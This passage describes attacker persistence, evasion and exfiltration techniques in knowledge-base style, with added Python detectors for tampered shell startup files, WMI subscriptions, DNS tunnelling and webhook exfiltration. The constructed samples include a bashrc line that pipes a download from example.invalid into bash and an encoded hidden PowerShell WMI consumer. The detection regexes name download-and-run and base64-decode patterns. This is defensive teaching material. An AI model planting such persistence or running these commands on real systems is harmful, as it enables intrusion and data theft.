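Against a real export, read the file and pass its text to `parse_reg`; the empty `AppInit_DLLs` and the bare-name Netsh helper in the sample show the two benign cases that produce no finding.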

Trap

Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.

Adversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format <code>trap 'command list' signals</code> where "command list" will be executed when "signals" are received.<sup>[[Trap Manual](https://app.tidalcyber.com/references/143462e1-b7e8-4e18-9cb1-6f4f3969e891)]</sup><sup>[[Cyberciti Trap Statements](https://app.tidalcyber.com/references/24cf5471-f327-4407-b32f-055537f3495e)]</sup>

The tag is: misp-galaxy:technique="Trap"

Unix Shell Configuration Modification

Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User [Unix Shell](https://app.tidalcyber.com/technique/3eafcd8b-0cb8-4d23-8785-3f80a3c897c7)s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (<code>/etc</code>) and the user’s home directory (<code>~/</code>) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.

Adversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash, the default shell for most GNU/Linux systems, as an example, adversaries may add commands that launch malicious binaries into the <code>/etc/profile</code> and <code>/etc/profile.d</code> files.<sup>[[intezer-kaiji-malware](https://app.tidalcyber.com/references/ef1fbb40-da6f-41d0-a44a-9ff444e2ad89)]</sup><sup>[[bencane blog bashrc](https://app.tidalcyber.com/references/503a4cd6-5cfe-4cce-b363-0cf3c8bc9feb)]</sup> These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into <code>~/.bash_profile</code>, <code>~/.bash_login</code>, or <code>~/.profile</code>, which are sourced when a user opens a command-line interface or connects remotely.<sup>[[anomali-rocke-tactics](https://app.tidalcyber.com/references/2308c5ca-04a4-43c5-b92b-ffa6a60ae3a9)]</sup><sup>[[Linux manual bash invocation](https://app.tidalcyber.com/references/06185cbd-6635-46c7-9783-67bd8742b66f)]</sup> Since the system only executes the first existing file in the listed order, adversaries have used <code>~/.bash_profile</code> to ensure execution. Adversaries have also leveraged the <code>~/.bashrc</code> file, which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.<sup>[[Tsunami](https://app.tidalcyber.com/references/95b5b03e-f160-47cf-920c-8f4f3d4114a3)]</sup><sup>[[anomali-rocke-tactics](https://app.tidalcyber.com/references/2308c5ca-04a4-43c5-b92b-ffa6a60ae3a9)]</sup><sup>[[anomali-linux-rabbit](https://app.tidalcyber.com/references/ec413dc7-028c-4153-9e98-abe85961747f)]</sup><sup>[[Magento](https://app.tidalcyber.com/references/b8b3f360-e14c-49ea-a4e5-8d6d9727e731)]</sup> Some malware targets the termination of a program to trigger execution; adversaries can use the <code>~/.bash_logout</code> file to execute malicious commands at the end of a session.

For macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using <code>/etc/profile</code>, <code>/etc/zshenv</code>, <code>/etc/zprofile</code>, and <code>/etc/zlogin</code>.<sup>[[ScriptingOSX zsh](https://app.tidalcyber.com/references/08b390aa-863b-420e-9b00-e168e3c756d8)]</sup><sup>[[PersistentJXA_leopitt](https://app.tidalcyber.com/references/2d66932e-1b73-4255-a9a8-ea8effb3a776)]</sup><sup>[[code_persistence_zsh](https://app.tidalcyber.com/references/b76d3ed0-e484-4ed1-aa6b-892a6f34e478)]</sup><sup>[[macOS MS office sandbox escape](https://app.tidalcyber.com/references/759e81c1-a250-440e-8b52-178bcf5451b9)]</sup> The login shell then configures the user environment with <code>~/.zprofile</code> and <code>~/.zlogin</code>. The interactive shell uses the <code>~/.zshrc</code> to configure the user environment. Upon exiting, <code>/etc/zlogout</code> and <code>~/.zlogout</code> are executed. For legacy programs, macOS executes <code>/etc/bashrc</code> on startup.
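The files listed above are a small, fixed set, which makes them cheap to audit. The following script is an added example (not MISP or Tidal Cyber code): it scans the bash and zsh startup files named in this entry for constructs that rarely belong in a legitimate rc file and reports files changed recently. The file list comes from the text; the SUSPICIOUS_PATTERNS rules, the seven-day window and the sample ~/.bashrc content are assumptions constructed for the demo.

```python
"""Audit Unix shell startup files for persistence-style modifications.

Added example, not MISP or Tidal Cyber code. The file names come from the
technique text (bash and zsh startup files); the SUSPICIOUS_PATTERNS rules and
the recently-modified window are assumptions a defender would tune locally.
"""
import os
import re
import time
from typing import Dict, List

# System-wide files sourced by login shells (bash/zsh), as listed in the text.
SYSTEM_STARTUP_FILES = [
    "/etc/profile", "/etc/bashrc", "/etc/zshenv", "/etc/zprofile",
    "/etc/zlogin", "/etc/zlogout",
]
# Per-user files sourced by login, interactive and logout shells.
USER_STARTUP_FILES = [
    ".bash_profile", ".bash_login", ".profile", ".bashrc", ".bash_logout",
    ".zprofile", ".zlogin", ".zshrc", ".zlogout",
]

# Assumed heuristics: constructs that rarely belong in a legitimate rc file.
SUSPICIOUS_PATTERNS = {
    # a binary launched from a world-writable scratch directory
    "exec_from_tmp": re.compile(r"(^|[\s;&|(])(/tmp|/dev/shm|/var/tmp)/\S+"),
    # a download piped straight into a shell
    "download_and_run": re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"),
    # a command hidden behind base64 decoding
    "encoded_command": re.compile(r"\bbase64\s+(-d|--decode)\b"),
    # a detached background process started on every shell launch
    "background_daemon": re.compile(r"\bnohup\b.*&\s*$|\bsetsid\b"),
}


def scan_startup_file(path: str, text: str) -> List[Dict[str, object]]:
    """Return one finding per (line, rule) match; blank lines and comments are skipped."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for rule, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(stripped):
                findings.append({"file": path, "line": lineno, "rule": rule, "text": stripped})
    return findings


def audit_host(home_dirs: List[str], max_age_days: int = 7) -> List[Dict[str, object]]:
    """Scan the startup files that exist on this host, plus /etc/profile.d/*.

    Besides content matches, any startup file modified within max_age_days is
    reported, because a change to these files is itself worth a look.
    """
    candidates = list(SYSTEM_STARTUP_FILES)
    if os.path.isdir("/etc/profile.d"):
        candidates += [os.path.join("/etc/profile.d", f) for f in sorted(os.listdir("/etc/profile.d"))]
    for home in home_dirs:
        candidates += [os.path.join(home, f) for f in USER_STARTUP_FILES]

    results: List[Dict[str, object]] = []
    now = time.time()
    for path in candidates:
        if not os.path.isfile(path):
            continue
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                results += scan_startup_file(path, fh.read())
            if now - os.path.getmtime(path) < max_age_days * 86400:
                results.append({"file": path, "line": 0, "rule": "recently_modified", "text": ""})
        except OSError:
            continue  # unreadable without privileges; skip rather than abort
    return results


# Constructed sample of a tampered ~/.bashrc, used by the demo below.
SAMPLE_BASHRC = """# constructed sample, not from a real host
export PATH="$HOME/bin:$PATH"
alias ll='ls -la'
nohup /dev/shm/.x >/dev/null 2>&1 &
curl -s http://example.invalid/i | bash
"""

if __name__ == "__main__":
    for f in scan_startup_file("sample ~/.bashrc", SAMPLE_BASHRC):
        print(f"{f['file']}:{f['line']} [{f['rule']}] {f['text']}")
    for f in audit_host([os.path.expanduser("~")]):
        print(f"{f['file']}:{f['line']} [{f['rule']}] {f['text']}")
```

On the sample content the scanner reports three findings: the /dev/shm launch and the nohup backgrounding on the same line, and the curl-to-shell pipe. Run as root to cover /etc/profile.d and other users' home directories; the recently_modified rule is a prompt to diff the file against a known-good copy, not a verdict on its own.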

The tag is: misp-galaxy:technique="Unix Shell Configuration Modification"

Windows Management Instrumentation Event Subscription

Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user login, or the computer’s uptime.<sup>[[Mandiant M-Trends 2015](https://app.tidalcyber.com/references/067497eb-17d9-465f-a070-495575f420d7)]</sup>

Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.<sup>[[FireEye WMI SANS 2015](https://app.tidalcyber.com/references/a9333ef5-5637-4a4c-9aaf-fdc9daf8b860)]</sup><sup>[[FireEye WMI 2015](https://app.tidalcyber.com/references/135ccd72-2714-4453-9c8f-f5fde31905ee)]</sup> Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.<sup>[[Dell WMI Persistence](https://app.tidalcyber.com/references/a88dd548-ac8f-4297-9e23-de2643294846)]</sup><sup>[[Microsoft MOF May 2018](https://app.tidalcyber.com/references/1d1da9ad-c995-4040-8103-b51af9d8bac3)]</sup>

WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.
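A subscription only becomes live once a binding joins a filter to a consumer, so detection is a correlation problem across three objects. The script below is an added example (not MISP or Tidal Cyber code) that joins Sysmon WmiEvent records (event IDs 19 filter, 20 consumer, 21 binding) by name and scores each resulting subscription: code-executing consumer types, suspicious consumer payloads, and clock- or uptime-based filters are the signals named in this entry. Field names follow Sysmon's WmiEvent schema (Name, Query, Type, Destination, Consumer, Filter); the records, the pattern list and the Windows default SCM Event Log subscription used as a benign baseline are constructed for the demo.

```python
"""Triage WMI event subscriptions from Sysmon WmiEvent records (IDs 19, 20, 21).

Added example, not MISP or Tidal Cyber code. Field names follow Sysmon's
WmiEvent schema (Name, Query, Type, Destination, Consumer, Filter); the
sample records and the heuristics are constructed for the demo.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Assumed heuristics for a consumer payload that warrants analyst attention.
PAYLOAD_PATTERNS = [
    re.compile(r"powershell.*(-enc\b|-e\s|encodedcommand|downloadstring)", re.I),
    re.compile(r"\b(mshta|wscript|cscript|regsvr32|rundll32)\b", re.I),
    re.compile(r"(%temp%|\\appdata\\|\\programdata\\|\\users\\public\\)", re.I),
]
# Filters on the clock or on uptime are the persistence triggers named in the text.
TIMER_FILTER = re.compile(r"Win32_LocalTime|Win32_PerfFormattedData_PerfOS_System", re.I)


@dataclass
class WmiSubscription:
    filter_name: str
    consumer_name: str
    query: Optional[str] = None
    consumer_type: Optional[str] = None
    destination: Optional[str] = None
    reasons: List[str] = field(default_factory=list)


def _name_from_ref(ref: str) -> str:
    """Binding fields look like '__EventFilter.Name="X"'; return X."""
    m = re.search(r'Name="([^"]+)"', ref)
    return m.group(1) if m else ref


def _executes_code(consumer_type: Optional[str]) -> bool:
    """CommandLine and ActiveScript consumers run supplied code; log/mail/file consumers do not."""
    t = re.sub(r"[\s_]", "", consumer_type or "").lower()
    return t.startswith("commandline") or t.startswith("activescript") or t.startswith("script")


def correlate_wmi_events(events: List[Dict[str, object]]) -> List[WmiSubscription]:
    """Join Created filter/consumer/binding records into scored subscriptions."""
    filters = {e["Name"]: e for e in events if e["EventID"] == 19 and e["Operation"] == "Created"}
    consumers = {e["Name"]: e for e in events if e["EventID"] == 20 and e["Operation"] == "Created"}
    subs: List[WmiSubscription] = []
    for e in events:
        if e["EventID"] != 21 or e["Operation"] != "Created":
            continue
        f_name, c_name = _name_from_ref(e["Filter"]), _name_from_ref(e["Consumer"])
        f, c = filters.get(f_name, {}), consumers.get(c_name, {})
        sub = WmiSubscription(f_name, c_name, f.get("Query"), c.get("Type"), c.get("Destination"))
        if _executes_code(sub.consumer_type):
            sub.reasons.append(f"consumer type '{sub.consumer_type}' executes code")
        if sub.destination and any(p.search(sub.destination) for p in PAYLOAD_PATTERNS):
            sub.reasons.append("consumer payload matches a suspicious pattern")
        if sub.query and TIMER_FILTER.search(sub.query):
            sub.reasons.append("filter fires on wall-clock time or uptime")
        subs.append(sub)
    return subs


def suspicious_subscriptions(events: List[Dict[str, object]]) -> List[WmiSubscription]:
    return [s for s in correlate_wmi_events(events) if s.reasons]


# Constructed records: one persistence-style subscription plus the default
# 'SCM Event Log' subscription that ships with Windows, as a benign baseline.
SAMPLE_EVENTS = [
    {"EventID": 19, "Operation": "Created", "Name": "ExampleFilter",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE "
              "TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 3"},
    {"EventID": 20, "Operation": "Created", "Name": "ExampleConsumer", "Type": "Command Line",
     "Destination": "powershell.exe -NoP -W Hidden -Enc BASE64_PLACEHOLDER"},
    {"EventID": 21, "Operation": "Created",
     "Filter": '__EventFilter.Name="ExampleFilter"',
     "Consumer": 'CommandLineEventConsumer.Name="ExampleConsumer"'},
    {"EventID": 19, "Operation": "Created", "Name": "SCM Event Log Filter",
     "Query": "select * from MSFT_SCMEventLogEvent"},
    {"EventID": 20, "Operation": "Created", "Name": "SCM Event Log Consumer",
     "Type": "Event Log", "Destination": ""},
    {"EventID": 21, "Operation": "Created",
     "Filter": '__EventFilter.Name="SCM Event Log Filter"',
     "Consumer": 'NTEventLogEventConsumer.Name="SCM Event Log Consumer"'},
]

if __name__ == "__main__":
    for s in suspicious_subscriptions(SAMPLE_EVENTS):
        print(f"{s.filter_name} -> {s.consumer_name}: {'; '.join(s.reasons)}")
```

Scoring the binding rather than the individual filter or consumer keeps the noise down: a filter or consumer created on its own does nothing until bound, and the baseline SCM subscription scores zero while the constructed one collects all three reasons. Because the consumer runs under WmiPrvSe.exe as SYSTEM, any hit here deserves the same response priority as a SYSTEM-level scheduled task.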

The tag is: misp-galaxy:technique="Windows Management Instrumentation Event Subscription"

Event Triggered Execution

Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events.<sup>[[Backdooring an AWS account](https://app.tidalcyber.com/references/2c867527-1584-44f7-b5e5-8ca54ea79619)]</sup><sup>[[Varonis Power Automate Data Exfiltration](https://app.tidalcyber.com/references/16436468-1daf-433d-bb3b-f842119594b4)]</sup><sup>[[Microsoft DART Case Report 001](https://app.tidalcyber.com/references/bd8c6a86-1a63-49cd-a97f-3d119e4223d4)]</sup>

Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.<sup>[[FireEye WMI 2015](https://app.tidalcyber.com/references/135ccd72-2714-4453-9c8f-f5fde31905ee)]</sup><sup>[[Malware Persistence on OS X](https://app.tidalcyber.com/references/d4e3b066-c439-4284-ba28-3b8bd8ec270e)]</sup><sup>[[amnesia malware](https://app.tidalcyber.com/references/489a6c57-f64c-423b-a7bd-169fa36c4cdf)]</sup>

Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges.

The tag is: misp-galaxy:technique="Event Triggered Execution"

Environmental Keying

Adversaries may environmentally key payloads or other features of malware to evade defenses and constrain execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary-supplied, environment-specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://app.tidalcyber.com/technique/aca9cbac-5c11-4050-8d9c-2a947c89a1e8) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.<sup>[[EK Clueless Agents](https://app.tidalcyber.com/references/ef7409d2-af39-4ad8-8469-76f0165687bd)]</sup>

Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.<sup>[[Kaspersky Gauss Whitepaper](https://app.tidalcyber.com/references/4bf39390-f3ca-4132-841e-b35abefe7dee)]</sup><sup>[[Proofpoint Router Malvertising](https://app.tidalcyber.com/references/b964139f-7c02-451d-8d22-a87975e60aa2)]</sup><sup>[[EK Impeding Malware Analysis](https://app.tidalcyber.com/references/c3e6c8da-1399-419c-96f5-7dade6fccd29)]</sup><sup>[[Environmental Keyed HTA](https://app.tidalcyber.com/references/b16bae1a-75aa-478b-b8c7-458ee5a3f7e5)]</sup><sup>[[Ebowla: Genetic Malware](https://app.tidalcyber.com/references/8c65dbc1-33ad-470c-b172-7497c6fd2480)]</sup> By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.<sup>[[Kaspersky Gauss Whitepaper](https://app.tidalcyber.com/references/4bf39390-f3ca-4132-841e-b35abefe7dee)]</sup><sup>[[Ebowla: Genetic Malware](https://app.tidalcyber.com/references/8c65dbc1-33ad-470c-b172-7497c6fd2480)]</sup> These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).

Similar to [Obfuscated Files or Information](https://app.tidalcyber.com/technique/046cc07e-8700-4536-9c5b-6ecb384f52b0), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.<sup>[[Kaspersky Gauss Whitepaper](https://app.tidalcyber.com/references/4bf39390-f3ca-4132-841e-b35abefe7dee)]</sup><sup>[[EK Impeding Malware Analysis](https://app.tidalcyber.com/references/c3e6c8da-1399-419c-96f5-7dade6fccd29)]</sup><sup>[[Environmental Keyed HTA](https://app.tidalcyber.com/references/b16bae1a-75aa-478b-b8c7-458ee5a3f7e5)]</sup><sup>[[Ebowla: Genetic Malware](https://app.tidalcyber.com/references/8c65dbc1-33ad-470c-b172-7497c6fd2480)]</sup><sup>[[Demiguise Guardrail Router Logo](https://app.tidalcyber.com/references/2e55d33a-fe75-4397-b6f0-a28d397b4c24)]</sup> By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.<sup>[[Kaspersky Gauss Whitepaper](https://app.tidalcyber.com/references/4bf39390-f3ca-4132-841e-b35abefe7dee)]</sup> This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.

Like other [Execution Guardrails](https://app.tidalcyber.com/technique/aca9cbac-5c11-4050-8d9c-2a947c89a1e8), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8). While use of [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.

The tag is: misp-galaxy:technique="Environmental Keying"

Execution Guardrails

Adversaries may use execution guardrails to constrain execution or actions based on adversary-supplied, environment-specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduce collateral damage from an adversary’s campaign.<sup>[[FireEye Kevin Mandia Guardrails](https://app.tidalcyber.com/references/0c518eec-a94e-42a7-8eb7-527ae3e279b6)]</sup> Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.<sup>[[FireEye Outlook Dec 2019](https://app.tidalcyber.com/references/f23a773f-9c50-4193-877d-97f7c13f48f1)]</sup>

Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8). While use of [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.

The tag is: misp-galaxy:technique="Execution Guardrails"

Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Asymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channel requires a private key (only in the possession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin.

Network protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol.

The tag is: misp-galaxy:technique="Exfiltration Over Asymmetric Encrypted Non-C2 Protocol"

Exfiltration Over Symmetric Encrypted Non-C2 Protocol

Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Symmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data.

Network protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) rather than using mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted such as HTTPS) or encryption in protocols that are not typically encrypted (such as HTTP or FTP).

The tag is: misp-galaxy:technique="Exfiltration Over Symmetric Encrypted Non-C2 Protocol"

Exfiltration Over Unencrypted Non-C2 Protocol

Adversaries may steal data by exfiltrating it over an unencrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.<sup>[[copy_cmd_cisco](https://app.tidalcyber.com/references/88138372-550f-5da5-be5e-b5ba0fe32f64)]</sup>

Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields.

The tag is: misp-galaxy:technique="Exfiltration Over Unencrypted Non-C2 Protocol"

Exfiltration Over Alternative Protocol

Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Adversaries may also opt to encrypt and/or obfuscate these alternate channels.

[Exfiltration Over Alternative Protocol](https://app.tidalcyber.com/technique/192d25ea-bae1-48e4-88de-e0acd481ab88) can be done using various common operating system utilities such as [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc)/SMB or FTP.<sup>[[Palo Alto OilRig Oct 2016](https://app.tidalcyber.com/references/14bbb07b-caeb-4d17-8e54-047322a5930c)]</sup> On macOS and Linux <code>curl</code> may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.<sup>[[20 macOS Common Tools and Techniques](https://app.tidalcyber.com/references/3ee99ff4-daf4-4776-9d94-f7cf193c2b0c)]</sup>

Many IaaS and SaaS platforms (such as Microsoft Exchange, Microsoft SharePoint, GitHub, and AWS S3) support the direct download of files, emails, source code, and other sensitive information via the web console or [Cloud API](https://app.tidalcyber.com/technique/af798e80-2cc5-5452-83e4-9560f08bf2d5).

The tag is: misp-galaxy:technique="Exfiltration Over Alternative Protocol"

Exfiltration Over C2 Channel

Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.

The tag is: misp-galaxy:technique="Exfiltration Over C2 Channel"

Exfiltration Over Bluetooth

Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.

Adversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.

The tag is: misp-galaxy:technique="Exfiltration Over Bluetooth"

Exfiltration Over Other Network Medium

Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.

Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.

The tag is: misp-galaxy:technique="Exfiltration Over Other Network Medium"

Exfiltration over USB

Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems.

The tag is: misp-galaxy:technique="Exfiltration over USB"

Exfiltration Over Physical Medium

Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.

The tag is: misp-galaxy:technique="Exfiltration Over Physical Medium"

Exfiltration Over Webhook

Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple mechanisms for allowing a server to push data over HTTP/S to a client without the need for the client to continuously poll the server.<sup>[[RedHat Webhooks](https://app.tidalcyber.com/references/37321591-40fd-537e-ba74-71042bc5064e)]</sup> Many public and commercial services, such as Discord, Slack, and webhook.site, support the creation of webhook endpoints that can be used by other services, such as Github, Jira, or Trello.<sup>[[Discord Intro to Webhooks](https://app.tidalcyber.com/references/bf5b3773-29cc-539a-a0f0-a6d1d63dee2d)]</sup> When changes happen in the linked services (such as pushing a repository update or modifying a ticket), these services will automatically post the data to the webhook endpoint for use by the consuming application.

Adversaries may link an adversary-owned environment to a victim-owned SaaS service to achieve repeated [Automated Exfiltration](https://app.tidalcyber.com/technique/26abc19f-5968-45f1-aa1f-f35863a2f804) of emails, chat messages, and other data.<sup>[[Push Security SaaS Attacks Repository Webhooks](https://app.tidalcyber.com/references/519693e2-71c9-55d2-98fd-be451837582a)]</sup> Alternatively, instead of linking the webhook endpoint to a service, an adversary can manually post staged data directly to the URL in order to exfiltrate it.<sup>[[Microsoft SQL Server](https://app.tidalcyber.com/references/a904fde8-b8f9-5411-ab46-0dacf39cc81f)]</sup>

Access to webhook endpoints is often over HTTPS, which gives the adversary an additional level of protection. Exfiltration leveraging webhooks can also blend in with normal network traffic if the webhook endpoint points to a commonly used SaaS application or collaboration service.<sup>[[CyberArk Labs Discord](https://app.tidalcyber.com/references/4b3cd2c0-fd0b-5583-8746-648229fc5f9d)]</sup><sup>[[Talos Discord Webhook Abuse](https://app.tidalcyber.com/references/affa93d8-5c8b-557d-80b4-1366df13d77a)]</sup><sup>[[Checkmarx Webhooks](https://app.tidalcyber.com/references/f68f1151-839e-5ae7-bab1-aa2b4c0d11ec)]</sup>
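Two of the channels described in this group of entries leave traces a defender can score from ordinary logs: encoded data carried in DNS labels (Exfiltration Over Unencrypted Non-C2 Protocol) and bulk POSTs to webhook endpoints (this entry). The script below is an added example (not MISP or Tidal Cyber code) that does both over constructed log lines: for DNS it groups queries by registrable zone and counts subdomain labels that look like base64 output with high character entropy; for the proxy log it sums outbound bytes POSTed to the webhook URL shapes of the services named above. The log line formats, the webhook URL prefixes, the thresholds and every sample line are assumptions.

```python
"""Flag exfiltration indicators in DNS query logs and web proxy logs.

Added example, not MISP or Tidal Cyber code. Log line formats, webhook URL
prefixes and thresholds are assumptions; all sample lines are constructed.
"""
import math
import re
from collections import defaultdict
from typing import Dict, List

# Webhook prefixes for the services named in the text (assumed URL shapes).
WEBHOOK_PATTERNS = [
    re.compile(r"^https?://(discord|discordapp)\.com/api/webhooks/", re.I),
    re.compile(r"^https?://hooks\.slack\.com/services/", re.I),
    re.compile(r"^https?://webhook\.site/", re.I),
]
# A DNS label that looks like base64/base64url output rather than a hostname.
BASE64ISH = re.compile(r"^[A-Za-z0-9+/=_-]{20,}$")


def shannon_entropy(s: str) -> float:
    """Bits per character; encoded data scores well above ordinary hostnames."""
    if not s:
        return 0.0
    counts: Dict[str, int] = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def analyze_dns(lines: List[str], min_hits: int = 5, entropy_threshold: float = 3.0) -> List[dict]:
    """Assumed line format: '<ts> <client> <qname> <qtype>'.

    Groups queries by registrable zone (last two labels) and flags zones with at
    least min_hits queries whose subdomain labels look like encoded data.
    """
    per_zone: Dict[str, dict] = {}
    for line in lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        _, client, qname, _ = parts[:4]
        labels = qname.rstrip(".").split(".")
        if len(labels) < 3:
            continue
        zone = ".".join(labels[-2:])
        z = per_zone.setdefault(zone, {"zone": zone, "queries": 0, "encoded_hits": 0, "clients": set()})
        z["queries"] += 1
        z["clients"].add(client)
        for label in labels[:-2]:
            if BASE64ISH.match(label) and shannon_entropy(label) >= entropy_threshold:
                z["encoded_hits"] += 1
    return [z for z in per_zone.values() if z["encoded_hits"] >= min_hits]


def analyze_proxy(lines: List[str]) -> List[dict]:
    """Assumed line format: '<ts> <client> <method> <url> <bytes_out>'.

    Sums outbound bytes POSTed to webhook endpoints per (client, host); all such
    traffic is returned for review, since webhooks rarely carry business uploads.
    """
    totals: Dict[tuple, dict] = {}
    for line in lines:
        parts = line.split()
        if len(parts) < 5:
            continue
        _, client, method, url, size = parts[:5]
        if method.upper() != "POST" or not any(p.match(url) for p in WEBHOOK_PATTERNS):
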